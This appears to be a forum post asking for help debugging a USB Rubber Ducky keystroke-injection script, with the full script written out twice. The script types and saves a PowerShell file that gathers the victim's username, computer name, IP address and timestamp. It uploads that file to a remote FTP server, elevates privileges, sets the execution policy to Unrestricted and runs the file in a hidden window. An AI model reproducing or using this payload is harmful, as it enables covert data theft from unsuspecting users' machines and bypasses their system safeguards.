tats

FIXED... Increased initial delay to allow the system to read the USB. SLOW system..!!!!

FIXED..!!!

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER